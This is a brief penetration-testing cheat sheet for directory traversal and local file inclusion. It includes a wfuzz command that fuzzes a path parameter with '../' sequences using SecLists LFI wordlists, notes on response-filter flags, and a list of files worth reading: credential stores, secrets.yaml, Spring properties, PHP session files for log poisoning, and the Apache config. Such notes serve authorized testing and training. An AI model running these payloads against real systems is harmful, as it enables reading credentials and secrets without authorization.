1. To use wfuzz to fuzz for possible directory traversal (in example below, hide 404, hide 81 to 125 characters):
Alternative wordlist to try:
/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt
/usr/share/seclists/Fuzzing/LFI/LFI-linux-and-windows_by-1N3@CrowdShield.txt

wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hc 404 --hh 81,125 http://dirTravSandbox/relativePathing.php?path=../../../../../../../../../../../../FUZZ

--hs/ss "regex" #Hide/Show
#Simple example, match a string: "Invalid username"
#Regex example: "Invalid *"

--hc/sc CODE #Hide/Show by code in response
--hl/sl NUM #Hide/Show by number of lines in response
--hw/sw NUM #Hide/Show by number of words in response
--hh/sh NUM #Hide/Show by number of chars in response
--hc/sc NUM #Hide/Show by response code

2. Interesting files to look at:

/.storage/auth
secrets.yaml

3. Spring configuration files:

/config/application.properties
application.properties

1. PHP Session file for potential log poisoning:
   /var/lib/php/sessions/sess_<snip> , with <snip> being the current PHPSESSID cookie value.

2. Apache conf file to find out web root:
   /etc/apache2/httpd.conf